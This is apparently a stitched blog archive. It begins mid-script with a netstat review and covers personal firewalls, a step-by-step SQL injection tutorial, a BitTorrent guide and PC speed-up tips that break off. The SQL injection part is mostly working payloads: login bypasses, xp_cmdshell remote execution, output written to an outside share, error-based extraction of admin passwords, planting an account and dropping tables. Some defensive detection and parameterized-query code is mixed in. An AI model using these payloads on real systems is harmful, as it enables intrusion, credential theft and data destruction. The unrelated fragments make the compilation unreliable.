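    return listeners


def reachable_from_outside(host):
    """A socket bound only to the loopback address cannot be reached remotely."""
    return not (host.startswith("127.") or host in ("::1", "[::1]"))


def review(netstat_text):
    """Return (proto, host, port, verdict) for every listening socket."""
    findings = []
    for sock in parse_listeners(netstat_text):
        service = WATCHED.get((sock["proto"], sock["port"]))
        if not reachable_from_outside(sock["host"]):
            verdict = "loopback only"
        elif service:
            verdict = "disable if unused: " + service
        else:
            verdict = "identify owning program"
        findings.append((sock["proto"], sock["host"], sock["port"], verdict))
    return findings


if __name__ == "__main__":
    for proto, host, port, verdict in review(SAMPLE_NETSTAT):
        print(f"{proto:<4}{host}:{port:<6} {verdict}")
```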


Hiding the Computer?
On their web sites, many personal firewall companies put a lot of weight on the ability of their firewall to hide the computer on the Internet. Yet, exposing your home computer on the Internet is, by itself, neither a security nor a privacy threat. If you provide some services to the Internet on your computer, for example, you put a web server on your computer to allow other people to view web pages, then you might get rid of some of the crackers by setting your firewall to unhide only this type of communication. Some attackers will not make a full scan of your computer, but only a partial scan, and if they did not scan for the specific service that you provide, they will not see your computer. Yet, if the service is a common one, there is a good chance that many of them will scan for it and thus discover the existence of your computer. If they "see" the existence of your computer, they might decide to scan it further, find out the services you are providing, and scan it for security holes to use. Yet, there is not much meaning to this when we speak about simple home computers.


What a Firewall Cannot Do!
Another misconception about personal firewalls is that they are thought to give overall protection against "hackers" (i.e. intrusions). They do not.

Defense Against Exploitation of Security Holes
A firewall can allow or deny access to or from your computer according to the type of communication, its source and destination, and which program on your computer is handling the communication. Yet, its ability to understand the details of the communication is very limited. For example, you may set the firewall to let your e-mail program get and/or send messages, or to stop it from doing so. It may likewise let your web browser browse the Internet, or stop it. But if you allow your e-mail program to communicate with the e-mail servers for sending and receiving messages (and you are likely to allow it if you want to use your e-mail program), or if you set the firewall to allow your web browser to communicate with web sites, the firewall will not be able to understand the content of the communication much further. If your web browser has a security hole and some remote site tries to exploit it, your firewall will not be able to distinguish between the communication that exploits the security hole and legitimate communication. The same principle goes for the e-mail program. A personal firewall may block you from receiving or sending e-mail messages, but if you allow it to receive messages, the personal firewall will not distinguish between a legitimate message and a non-legitimate one (such as one that carries a virus or a Trojan horse). Security holes in legitimate programs can be exploited, and a personal firewall can do practically nothing about it.


I should comment, however, that some personal firewalls come combined with some Trojan horse detection, or intrusion detection. This is not part of the classical definition of a firewall, but it might be useful. Such tasks are usually taken by other tools such as antivirus programs or antiTrojan programs.


Tricks to Bypass or Disable Personal Firewalls
There are also various ways to disable or bypass personal firewalls. Over time, a few tricks to bypass or disable them have been demonstrated by various programs, especially tricks that let an internal program communicate with the outside by bypassing or tricking the firewall. For some of them, such as the one demonstrated by Leaktest, in which a non-legitimate program disguises itself as Internet Explorer, practically all personal firewalls today are immune. Other tricks, such as the one demonstrated by Outbound, which uses a non-standard type of communication directly to the network adapters, bypassing the components of the operating system which are supposed to deal with Internet communication and thereby bypassing the firewall, are only now being patched against by the various firewalls. Yet other methods, such as the one demonstrated by Tooleaky, which uses Internet Explorer as a messenger to communicate with the outside and is thus identified as mere legitimate browsing, are still waiting for most personal firewalls to find a fix.


Firewalls CANNOT Decide for You What is a Legitimate Communication and What is Not
One of the main problems with personal firewalls is that you cannot simply install them and forget them, counting on them to do their job. They can deny or permit various types of communications according to some criteria, but what are these criteria, and who decides on the criteria for whether they should permit or deny some communication?
The answer is that it is the computer user's job to define the exact criteria for when the firewall should allow a communication and when it should block it. The firewall may make it easier for you, but it should not make the decisions. There are too many programs and too many versions, and it is not possible for the firewall to decide accurately when a communication is legitimate and when it is not. One person might think that it is legitimate for some program to deliver some information to the outside in order to get some service, while another will think that it is not. One version of a program might communicate with its home server in order to check whether there is an upgrade, and another version might also install the upgrade even if you do not wish it. Some firewalls will try to identify communication efforts which are largely considered legitimate, and will give you this information so that it will be easier for you to decide whether they should be allowed. Others will make do with more basic information, making no suggestions (and thus no incorrect recommendations). One way or another, once you have installed a firewall, you will have better means to understand what types of communications are running on your computer, but you will also have to understand them in order to be able to configure your firewall so that it correctly knows which communications to allow and which to block.


Common Problems and Deficiencies Regarding Personal Firewalls
A personal firewall might be a good contribution to security. Yet, if you do not understand much about the topic, then you are likely to be confused and misled by its alerts and queries, and thus find yourself spending hours chasing after imaginary crackers, fearing imaginary threats, and misconfiguring it due to misunderstanding. You may find yourself blocking legitimate and important communication, believing it to be cracking efforts, and then be surprised that things work slowly or that you are disconnected from the Internet, or you might be misled into allowing a non-legitimate communication by some software that tricked you into believing that it is a legitimate one. On the other hand, if you are quite knowledgeable about computers and security, then you are likely to defend your computer effectively even without a firewall (by the means discussed in section II.4), and thus the role of a personal firewall in securing your computer is extremely small and not very important. We briefly discuss here some of the problems that personal firewalls may generate.


A False Sense of Security
As we've already learned here, a firewall is limited in its ability to secure your computer. Yet, many people believe that if they install a personal firewall they will be secured against the various security threats. I was even surprised to find out that there are people who give much higher priority to installing a personal firewall than to installing an antivirus program. An always-updated antivirus program plays a much more important role in the security of a personal home computer than installing and maintaining a personal firewall. A personal firewall should not come at the expense of any other security measure that you use.


A False Sense of Insecurity
When you install a firewall and look at all the communication efforts through it, you might be surprised at the number of communication efforts from the Internet to your computer. Most of them are blocked by a typically configured firewall. There are constant efforts to communicate with various backdoor Trojans on your computer. If you are not infected, there will be nothing to listen and respond to those communication efforts, and they are thus practically harmless. There are efforts to communicate with your NBT driver, to see if your computer mistakenly allows file sharing. There are other types of probes to see if your computer exists, or various efforts by servers to probe your computer in order to find the best path for legitimate communication to it. There are sometimes remnants of communications that were supposed to go to other computers but made their way to yours (for advanced readers: because the IP number that your computer uses was used by some other computer earlier). Those communication efforts are blocked even without a firewall. If your computer is not infected with a RAT, and if your computer doesn't have NetBIOS over TCP/IP enabled, or even if it merely does not have file and print sharing enabled (and on most computers this is disabled by default), then none of these pose any security threat. If your computer is not infected with a SubSeven Trojan, then no matter how often there are efforts to communicate with it, they are all doomed to fail.
Yet, some personal firewalls (such as Norton Personal Firewall or ZoneAlarm) by default proudly announce that they have just blocked an effort to crack into your computer. Norton may even define those blocked efforts as "high security threats" when they would not have been a threat at all even if your computer had no personal firewall. Such firewalls give you the false impression that they save your computer again and again from extremely dangerous threats on the Internet, so that you wonder how you survived so long without noticing any intrusion before you installed the firewall. I usually say that those personal firewalls have their "report level" set to "promotional mode". Namely, the personal firewall is set to give you the false impression that it is much more important than it really is.


Chasing After Ghosts
This is a side effect of the types of misunderstandings that were discussed in the previous subsection.
When a person who is starting to learn the jargon related to personal firewalls is told that some "dangerous" communication efforts persist from the same source, the person is determined to locate and identify the "hacker", and perhaps report it to the police or to his or her Internet service provider. However, since many people do not really understand thoroughly how things work, they may sometimes spend many hours trying to locate a cracker that does not exist, or find that the knowledge they need in order to track the cracker is much greater than what they have, and they might even suspect the wrong person due to lack of knowledge (e.g. the contact person at the Internet service provider that was used by the cracker). More knowledgeable people usually do not bother to track those "hackers" (who are usually teenagers), but instead concentrate on the security of their computer.


Blocking Legitimate Communications
No personal firewall is smart enough to decide for the user what is a legitimate communication and what is not. A personal firewall cannot distinguish between a legitimate program trying to contact its server to check and notify the user when there is a newer version, and a non-legitimate program trying to communicate with its server in order to deliver sensitive information such as passwords, unless the user tells it. It is thus up to the user to decide what should be considered legitimate and what should not. Yet, can we count on the user to be knowledgeable enough to decide what is legitimate and what is not? In many cases the user is not knowledgeable enough, and may thus allow non-legitimate communication or disallow a legitimate and important communication. There are many types of communications whose only job is to manage other communications. Among these are various types of communications between your computer and the various servers of your Internet service provider. A user who is not knowledgeable may interpret those types of communications as cracking efforts, and will thus decide to block them. As a result, a connection might become slower, a connection to the Internet service provider might be dropped quite often, and other types of communication problems might appear.


Being Tricked by Trojans
Just as less knowledgeable users may instruct the firewall to block legitimate communications, they can be tricked by various Trojans into allowing them to communicate. Some Trojans use names resembling or identical to the names of legitimate programs, so that the user will think that they are legitimate programs. Users should be aware of that.


Heavy Software, Buggy Software
Until now we have discussed only problems related to a lack of appropriate knowledge on the user's part. Yet, there are other problems regarding personal firewalls. For example, some of them are known to be quite heavy on computer resources, or to slow down the communication speed. Personal firewalls vary quite a lot in this regard. If you have a new computer with a slow Internet connection (such as regular dial-up networking), then a firewall might not slow down your computer noticeably. Yet, if you use an older computer and a fast connection, you might find that some personal firewalls slow down your communication quite drastically. Personal firewalls also vary in how stable they are.


Advantages of External Firewalls over Personal Firewalls
1. They do not take resources from the computer. This should be clear. This is especially useful when the firewall blocks flooding attacks.
2. It is harder (although in principle still possible) for a Trojan horse to disable it, because it does not reside in the same computer that the Trojan has infected. It is not possible to use the specific communication while totally bypassing the firewall.
3. They can be used without any dependence on the operating system on the computer(s) they defend.
4. No instability problems.

Thursday, September 2, 2010

SQL INJECTION WITH EXAMPLE

 

1. What is SQL Injection

When a machine has only port 80 open, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patches his server, we have to turn to web hacking. SQL injection is one type of web hacking that requires nothing but port 80, and it might just work even if the admin is patch-happy. It attacks the web application (ASP, JSP, PHP, CGI, etc.) itself rather than the web server or the services running in the OS.

This will help beginners grasp the problems they face when trying to use SQL Injection techniques, use those techniques successfully, and protect themselves from such attacks.
This article does not introduce anything new; SQL injection has been widely written about and used in the wild. We wrote the article because we would like to document some of our pen-tests using SQL injection and hope that it may be of some use to others. You may find a trick or two, but please check out "11.0 Where can I get more info?" for the people who truly deserve credit for developing many techniques in SQL injection.

What do you need for SQL Injection?
Any web browser.

Where to Start SQL Injection?


Try to look for pages that allow you to submit data, e.g. a login page, search page, feedback page, etc. Sometimes, HTML pages use the POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML and look for the "FORM" tag in the HTML code. You may find something like this in some HTML code:

    <FORM action=Search/search.asp method=post>
    <input type=hidden name=A value=C>
    </FORM>

Everything between <FORM> and </FORM> holds potential parameters that might be useful (exploit-wise).

1. What if you can't find any page that takes input?

You should look for pages like ASP, JSP, CGI, or PHP web pages. Look especially for URLs that take parameters, like:

    http://duck/index.asp?id=10

2. How do you test if it is vulnerable for SQL Injection?

Start with the single quote trick. Input something like:

    hi' or 1=1--

into the login, or password, or even the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--

If you must do this with a hidden field, just download the source HTML from the site, save it on your hard disk, and modify the URL and hidden field accordingly. Example:

    <FORM action=http://duck/Search/search.asp method=post>
    <input type=hidden name=A value="hi' or 1=1--">
    </FORM>

If luck is on your side, you will get logged in without any login name or password.

3. But why is ' or 1=1-- important in SQL Injection?

Let us look at another example of why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an ASP page that links you to another page with the following URL:

    http://duck/index.asp?category=food

In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP page might contain the following code (OK, this is the actual code that we created for this exercise):

    v_cat = request("category")
    sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
    set rs=conn.execute(sqlstr)

As we can see, our value will be placed into v_cat, and thus the SQL statement should become:

    SELECT * FROM product WHERE PCategory='food'

The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'. Now, assume that we change the URL into something like this:

    http://duck/index.asp?category=food' or 1=1--

Now our variable v_cat equals "food' or 1=1-- ". If we substitute this into the SQL query, we will have:

    SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query should now select everything from the product table regardless of whether PCategory is equal to 'food' or not. A double dash "--" tells MS SQL Server to ignore the rest of the query, which gets rid of the last hanging single quote ('). Sometimes, it may be possible to replace the double dash with a single hash "#".
However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you may also try

    ' or 'a'='a

The SQL query will now become:

    SELECT * FROM product WHERE PCategory='food' or 'a'='a'

It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:

    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or 'a'='a
    " or "a"="a
    ') or ('a'='a

4. How do I get remote execution with SQL injection?

Being able to inject SQL commands usually means we can execute any SQL query at will. A default installation of MS SQL Server runs as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

    '; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try using a double quote (") if a single quote (') is not working. The semicolon ends the current SQL query and thus allows you to start a new SQL command. To verify that the command executed successfully, you can listen for ICMP packets on 10.10.1.2 and check whether there is any packet from the server:

    #tcpdump icmp

If you do not get any ping request from the server, and get an error message indicating a permission error, it is possible that the administrator has limited the Web User's access to these stored procedures.

5. How to get the output of my SQL query by SQL Injection?

It is possible to use sp_makewebtask to write your query into an HTML file:

    '; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

But the target IP must have the folder "share" shared for Everyone.

6. How to get data from the database using ODBC error message by SQL Injection?

We can use information from the error messages produced by MS SQL Server to get almost any data we want. Take the following page for example:

    http://duck/index.asp?id=10

We will try to UNION the integer '10' with another string from the database:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

The system table INFORMATION_SCHEMA.TABLES contains information on all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

    SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

This should return the first table name in the database. When we UNION this string value with the integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
    /index.asp, line 5

The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".
To get the next table name, we can use the following query:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

We can also search for data using the LIKE keyword:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
    /index.asp, line 5

The matching pattern, '%25login%25', will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".

7. How to mine all column names of a table by SQL Injection?

We can use another useful table, INFORMATION_SCHEMA.COLUMNS, to map out all the column names of a table:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
    /index.asp, line 5

Now that we have the first column name, we can use NOT IN () to get the next column name:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id')--

Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
    /index.asp, line 5

When we continue further, we obtain the rest of the column names, i.e. "password", "details". We know we have them all when we get the following error message:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id','login_name','password','details')--

Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
    /index.asp, line 5

8. How to retrieve any data we want?
Now that we have identified some important tables and their columns, we can use the same technique to gather any information we want from the database.
Now, let's get the first login_name from the "admin_login" table:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
    /index.asp, line 5

We now know there is an admin user with the login name "neo". Finally, to get the password of "neo" from the database:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
    /index.asp, line 5

We can now log in as "neo" with his password "m4trix".

9. How to get numeric string value?

There is a limitation to the technique described above. We cannot get any error message if we are trying to convert text that consists of a valid number (characters between 0-9 only). Let's say we are trying to get the password of "trinity", which is "31173":

    http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

We will probably get a "Page Not Found" error. The reason is that the password "31173" will be converted into a number before the UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL Server will not throw an ODBC error message, and thus we will not be able to retrieve any numeric entry.
To solve this problem, we can append some letters to the numeric string to make sure the conversion fails. Let us try this query instead:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

We simply use a plus sign (+) to append any text we want to the password (the ASCII code for '+' is 0x2b). We will append '(space)morpheus' to the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. When we manually call the convert() function to try to convert '31173 morpheus' into an integer, SQL Server will throw an ODBC error message:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
    /index.asp, line 5

Now, you can even log in as 'trinity' with the password '31173'.

10. How to update/insert data into the database by SQL Injection?

Once we have successfully gathered all the column names of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change the password for "neo":

    http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--

To INSERT a new record into the database:

    http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

We can now log in as "neo2" with the password "newpas5".
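From the defender's side, the requests shown in the sections above leave a recognizable trail in the web server's access log. The following added example (not part of the original article) decodes query strings from constructed Common Log Format lines and flags the patterns this walkthrough uses; the rule names, log lines and client addresses are assumptions of the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log lines (Common Log Format). Client addresses are
# documentation values; the query strings reuse requests from the article.
SAMPLE_LOG = """\
198.51.100.7 - - [02/Sep/2010:10:00:01 +0000] "GET /index.asp?id=10 HTTP/1.1" 200 512
198.51.100.7 - - [02/Sep/2010:10:00:05 +0000] "GET /index.asp?category=food'%20or%201=1-- HTTP/1.1" 200 9041
198.51.100.7 - - [02/Sep/2010:10:00:09 +0000] "GET /index.asp?id=10%20UNION%20SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES-- HTTP/1.1" 500 311
198.51.100.7 - - [02/Sep/2010:10:00:12 +0000] "GET /index.asp?id=10;%20exec%20master..xp_cmdshell%20'ping%2010.10.1.2'-- HTTP/1.1" 500 298
203.0.113.9 - - [02/Sep/2010:10:01:30 +0000] "GET /search.asp?q=union+station+hotels HTTP/1.1" 200 733
203.0.113.9 - - [02/Sep/2010:10:01:44 +0000] "GET /index.asp?category=food HTTP/1.1" 200 1204
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})\b')

# Each rule runs on the URL-decoded query string, so %20 and %2b encodings
# do not hide the SQL keywords.
RULES = [
    # "or X=X" with identical operands, quoted or not: or 1=1, or 'a'='a
    ("tautology", re.compile(r"""\bor\s+['"]?(\w+)['"]?\s*=\s*['"]?\1\b""", re.I)),
    ("union_select", re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)),
    ("schema_probe", re.compile(r"\binformation_schema\.", re.I)),
    ("dangerous_proc", re.compile(r"\b(?:xp_cmdshell|sp_makewebtask)\b", re.I)),
    ("stacked_statement", re.compile(r";\s*(?:exec|update|insert|drop|delete)\b", re.I)),
]


def scan(log_text):
    """Return one record per parsable log line with the rules it matched."""
    records = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        _path, _, query = target.partition("?")
        decoded = unquote_plus(query)
        matched = [name for name, rx in RULES if rx.search(decoded)]
        records.append({"client": client, "query": decoded,
                        "status": int(status), "rules": matched})
    return records


def summarize(records):
    """Count flagged requests per client. Flagged requests answered with a
    500 are counted separately: error-based extraction produces runs of them."""
    per_client = defaultdict(lambda: {"requests": 0, "flagged": 0, "flagged_500": 0})
    for rec in records:
        stats = per_client[rec["client"]]
        stats["requests"] += 1
        if rec["rules"]:
            stats["flagged"] += 1
            if rec["status"] == 500:
                stats["flagged_500"] += 1
    return dict(per_client)


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        if rec["rules"]:
            print(rec["client"], rec["status"], ",".join(rec["rules"]), rec["query"])
    print(summarize(scan(SAMPLE_LOG)))
```

A word such as "union" in an ordinary search term is not flagged, because the rule requires a following "select".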

WHAT IS SQL INJECTION

SQL Injection is the most popular method of deliberately passing SQL commands through an input field in an application. As a developer, you should know how to protect your application from SQL Injection.
SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding in your web applications that allows hackers to inject SQL commands into, say, a login form, so that they gain access to the data held within your database.

Which parts of your application are at risk from SQL Injection?
SQL Injection is a hacking technique which attempts to pass SQL commands and SQL queries (statements) through a web application or desktop application for execution by the backend database. If input is not sanitized properly, web applications may be open to SQL Injection attacks that allow hackers to view information from the database and/or even wipe it out.
Such features as login pages, support and product request forms, feedback forms, search pages, shopping carts and the general delivery of dynamic content, shape modern websites and provide businesses with the means necessary to communicate with prospects and customers. These website features are all examples of web applications which may be either purchased off-the-shelf or developed as bespoke programs.
These website features are all susceptible to SQL Injection attacks which arise because the fields available for user input allow SQL statements to pass through and query the database directly.

Basic SQL Injection, power of 'T'='T'
Most login pages ask the user for a User Name and Password. The user types them into the login form and submits it for authentication. The system queries the database with the supplied user name and password: if a match is found in the database it authenticates the user, otherwise it shows a login-failed message. When we submit the login page, most login pages pass a query like this to the database:

    "select * from user_master where user_name='" & TxtUserName.Text & _
    "' and user_password ='" & TxtPassword.Text & "'"

If we type ANYUSER as the User Name and ANYPASS as the Password, the actual query looks like this:

    select * from user_master where user_name='ANYUSER' and
    user_password ='ANYPASS'

It will not work, as there is no such user name and password in the table user_master, and the page will show the login-failed message. Now change the password to   ANYPASS' or 'T' = 'T   and submit the page again. This time the query looks like this:

    select * from user_master where user_name='ANYUSER' and
    user_password ='ANYPASS' or 'T' = 'T'

Now it works, and you are able to log in to the page without knowing the user name and password. How did that happen? AND is evaluated before OR, so the WHERE clause reduces to (name and password match) or 'T' = 'T', and because 'T' = 'T' is always true the query returns all records from the table.

What SQL commands can you pass
If the underlying database supports multiple commands in a single line, then you can pass any valid DML, DCL or DDL command through SQL injection. For example, the following input will drop the user_master table from the database: type   ANYPASS' ; drop table user_master --   in the password box and submit the page again. This time the underlying query looks like this:


    select * from user_master where user_name='ANYUSER' and
    user_password ='ANYPASS' ; drop table user_master -- '

Now it drops the user_master table from the database. In this case we passed the drop table command along with the password. The two dashes (--) start a comment in SQL, so nothing after them is executed. If you know the table structure, you can insert and update records through SQL Injection as well.
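
The login query above, as an added example in Python with an in-memory SQLite table (not code from the original post): the concatenated form next to a parameterized form, run against the two password strings the post uses. The sample account alice/s3cret and all function names are constructed for the illustration.

```python
import sqlite3


def make_db():
    """In-memory user_master table holding one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table user_master (user_name text, user_password text)"
    )
    # Constructed sample row. Plaintext only to mirror the post's query;
    # a real table would hold a salted password hash instead.
    conn.execute("insert into user_master values (?, ?)", ("alice", "s3cret"))
    conn.commit()
    return conn


def build_concatenated_query(user_name, password):
    """The post's query: user input pasted straight into the SQL text."""
    return (
        "select * from user_master where user_name='" + user_name
        + "' and user_password ='" + password + "'"
    )


def login_concatenated(conn, user_name, password):
    """Vulnerable form: the input becomes part of the SQL grammar."""
    query = build_concatenated_query(user_name, password)
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, user_name, password):
    """Hardened form: the SQL text is fixed and the input is bound as data."""
    query = "select * from user_master where user_name=? and user_password=?"
    return conn.execute(query, (user_name, password)).fetchone() is not None


def table_exists(conn, name):
    """True if a table with this name is still present in the database."""
    row = conn.execute(
        "select 1 from sqlite_master where type='table' and name=?", (name,)
    ).fetchone()
    return row is not None


def demo():
    """Run both forms against the post's inputs and collect the outcomes."""
    conn = make_db()
    tautology = "ANYPASS' or 'T' = 'T"                 # string from the post
    stacked = "ANYPASS' ; drop table user_master --"   # string from the post
    return {
        "concat_plain": login_concatenated(conn, "ANYUSER", "ANYPASS"),
        "concat_tautology": login_concatenated(conn, "ANYUSER", tautology),
        "param_tautology": login_parameterized(conn, "ANYUSER", tautology),
        "param_stacked": login_parameterized(conn, "ANYUSER", stacked),
        "param_valid": login_parameterized(conn, "alice", "s3cret"),
        "table_intact": table_exists(conn, "user_master"),
    }


if __name__ == "__main__":
    for check, outcome in demo().items():
        print(f"{check:18} {outcome}")
```

With bound parameters both strings are compared against the stored password as ordinary text, so neither one logs in and the table is left in place.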

Monday, August 16, 2010

HOW TO DOWNLOAD FILES BY TORRENT BITTORRENT

Bit Torrent Tutorials

The first things you need to know about using Bit Torrent:
-- Bit Torrent is aimed at broadband users (or any connection better than dialup).
-- Sharing is highly appreciated, and sharing is what keeps bit torrent alive.
-- A bit torrent file (*.torrent) contains information about the piece structure of the download (more on this later)
-- The method of downloading is not your conventional type of download. Since downloads do not come in as one
big chunk, you are able to download from many people at once, increasing your download speeds. There may be
100 "pieces" to a file, or 20,000+ pieces, all depending on what you're downloading. Pieces are usually small (under 200kb)
-- The speeds are based upon people sharing as they download, and seeders. Seeders are people who constantly
share in order to keep torrents alive. Usually seeders are on fast connections (10mb or higher).

In this tutorial, I will be describing it all using a bit torrent client called Azureus. This client is used to decode the .torrent files into a useable format to download from other peers. From here on out, I will refer to Bit Torrent as BT.

Which BT client you use, is purely up to you. I have tried them all, and my personal favorite is Azureus for many reasons. A big problem with most BT clients out there, is that they are extremely CPU intensive, usually using 100% of your cpu power during the whole process. This is the number one reason I use Azureus. Another, is a recently released plug-in that enables you to browse all current files listed on suprnova.org (the #1 source for torrent downloads).

Before you use the plug-in, take a look at /http://www.suprnova.org, and browse the files. Hold your mouse over the links, and you'll notice every file ends in .torrent. This is the BT file extension. Usually, .torrent files are very small, under 200kb. They contain a wealth of information about the file you want to download. A .torrent file can contain just 1 single file, or a directory full of files and more directories. But regardless, every download is split up into hundreds or thousands of pieces. The pieces make it much easier to download at higher speeds. Back to suprnova.org. Look at the columns:

Added | Name | Filesize | Seeds | DLs (and a few more which aren't very useful.)

I'll break this down.
Added: Self-explanatory, it's the date the torrent was added.
Name: Also self-explanatory.
Filesize: Duh
Seeds: This is how many people are strictly UPLOADING, or sharing. These people are the ones that keep .torrent files alive. By "alive", I mean, if there's no one sharing the .torrent file, no one can download.
DLs: This is how many people are currently downloading that particular torrent. They also help keep the torrent alive as they share while they download.

It's always best to download using a torrent that has a decent amount of seeders and downloaders, this way you can be assured there's a good chance your download will finish. The more the better.

Now that you should understand how torrent files work, and how to use them, on to Azureus!
First, get JAVA! You need this to run Azureus, as java is what powers it. Get Java here: /http://java.sun.com/j2se/1.4.2/download.html
Next, get Azureus at: /http://azureus.sourceforge.net
Next, get the Suprnovalister plugin from /http://s93732957.onlinehome.us/storage/suprnovalister.jar

Install Java JRE before you do ANYTHING.

Install Azureus, and then in the installation folder, create 2 more folders. ./Plugins/suprnovalister (For example, if you installed Azureus to C:\PROGRAM FILES\AZUREUS, create C:\PROGRAM FILES\AZUREUS\PLUGINS\SUPRNOVALISTER). Next, put the suprnovalister.jar file that you downloaded, in that folder.

Load up Azureus, and if you want, go through the settings and personalize it.

The tab labeled "My Torrents" is the section of Azureus you need the most often. That lists all your transfers, uploads and downloads. It shows every bit of information you could possibly want to know about torrents you download.

In the menu bar, go to View > Plugins > Suprnova Lister. This will open up a new tab in Azureus. Click on "Update Mirror". This will get a mirror site of suprnova.org containing all current torrent files available. Once a mirror is grabbed, choose a category from the drop-down box to the left and click "Update". Wah-lah, all the available downloads appear in the main chart above. Just double click a download you want, and bang its starting to download. Open the "My Torrents" tab again to view and make sure your download started.

After your download has finished, be nice, and leave the torrent transferring. So people can get pieces of the file from you, just as you got pieces from other people.

Alternatively, if you don't want to use the plugin... you can just head to suprnova.org and download files to any folder. Then go to File > Open > .torrent File in Azureus.

This should about wrap it up for the Bit Torrent Tutorial. If you guys think of anything I should add, or whatnot, just let me know and I'll check into it.

Sunday, August 1, 2010

HOW TO SPEED UP YOUR PC SUGGESTIONS BY EXPERT

Since defragging the disk won't do much to improve Windows XP performance, here are 23 suggestions that will. Each can enhance the performance and reliability of your customers' PCs. Best of all, most of them will cost you nothing.


1.) To decrease a system's boot time and increase system performance, use the money you save by not buying defragmentation software -- the built-in Windows defragmenter works just fine -- and instead equip the computer with an Ultra-133 or Serial ATA hard drive with 8-MB cache buffer.

2.) If a PC has less than 512 MB of RAM, add more memory. This is a relatively inexpensive and easy upgrade that can dramatically improve system performance.

